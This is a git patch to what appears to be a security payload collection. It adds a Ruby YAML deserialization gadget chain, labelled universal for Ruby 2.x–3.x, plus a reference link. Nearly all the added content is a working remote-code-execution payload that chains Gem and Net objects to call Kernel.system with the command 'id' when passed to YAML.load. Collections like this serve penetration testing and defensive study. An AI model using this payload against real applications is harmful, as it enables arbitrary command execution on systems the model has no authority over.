From eb933317d0d641dc5917ccecffd8cf63aca98732 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Mi=C5=82osz=20Skaza?= <milosz.skaza@ctfd.io>
Date: Wed, 1 Jun 2022 09:55:48 +0100
Subject: [PATCH] Add new ruby yaml gadget chain

---
 Insecure Deserialization/Ruby.md | 29 +++++++++++++++++++++++++++--
 1 file changed, 27 insertions(+), 2 deletions(-)

diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md
index 6263526..79c91e7 100644
--- a/Insecure Deserialization/Ruby.md	
+++ b/Insecure Deserialization/Ruby.md	
@@ -16,7 +16,7 @@ require "yaml"
 YAML.load(File.read("p.yml"))
 ```
 
-Exploitation code
+Universal gadget for ruby <= 2.7.2:
 ```ruby
 --- !ruby/object:Gem::Requirement
 requirements:
@@ -29,9 +29,34 @@ requirements:
       spec:
 ```
 
+Universal gadget for ruby 2.x - 3.x.
+
+```ruby
+---
+- !ruby/object:Gem::Installer
+    i: x
+- !ruby/object:Gem::SpecFetcher
+    i: y
+- !ruby/object:Gem::Requirement
+  requirements:
+    !ruby/object:Gem::Package::TarReader
+    io: &1 !ruby/object:Net::BufferedIO
+      io: &1 !ruby/object:Gem::Package::TarReader::Entry
+         read: 0
+         header: "abc"
+      debug_output: &1 !ruby/object:Net::WriteAdapter
+         socket: &1 !ruby/object:Gem::RequestSet
+             sets: !ruby/object:Net::WriteAdapter
+                 socket: !ruby/module 'Kernel'
+                 method_id: :system
+             git_set: id
+         method_id: :resolve
+```
+
 
 ## References
 
 - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
 - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
-- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
\ No newline at end of file
+- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
+- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
\ No newline at end of file